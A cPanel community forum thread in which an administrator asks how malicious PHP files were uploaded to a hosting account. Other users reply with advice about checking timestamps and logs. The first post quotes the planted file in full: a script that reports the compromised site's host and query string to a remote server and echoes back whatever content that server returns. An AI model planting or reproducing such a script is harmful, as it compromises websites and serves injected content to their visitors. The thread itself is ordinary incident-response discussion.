The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Find out how files were uploaded

Discussion in 'Security' started by ::Gomez::, Sep 13, 2016.

  1. ::Gomez::

    ::Gomez:: Member

    Joined:
    Oct 13, 2003
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Argentina
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hi, I am dealing with a security issue inside an account. Everyday new files are uploaded to public_html and subfolders, with strange content inside..

    for example...

    /home/xxx/public_html/rtrfei.php
    /home/xxx/public_html/fdbs.php

    content is pretty much the same on any of the files...

    PHP:
    <?php
    set_time_limit
    (0);

    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server "http://www.example.date/";
    $host_name "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

    echo 
    $Content_mb;

    ?>

    I would like to know if there is any way of finding out how this files were uploaded... (FTP, SCP, SSH, via an script on the server.. etc...)


    I think this is the first step to be able to identify the root cause of this issue..

    I do have root access to the server.


    thanks!
     
    #1 ::Gomez::, Sep 13, 2016
    Last edited by a moderator: Sep 13, 2016
  2. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,381
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.
     
  3. NOC_Serverpoint

    NOC_Serverpoint Active Member

    Joined:
    Jul 3, 2016
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    Website Owner
    You would just have to check network and file access logs in the server
     
  4. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,678
    Likes Received:
    653
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
Loading...

Share This Page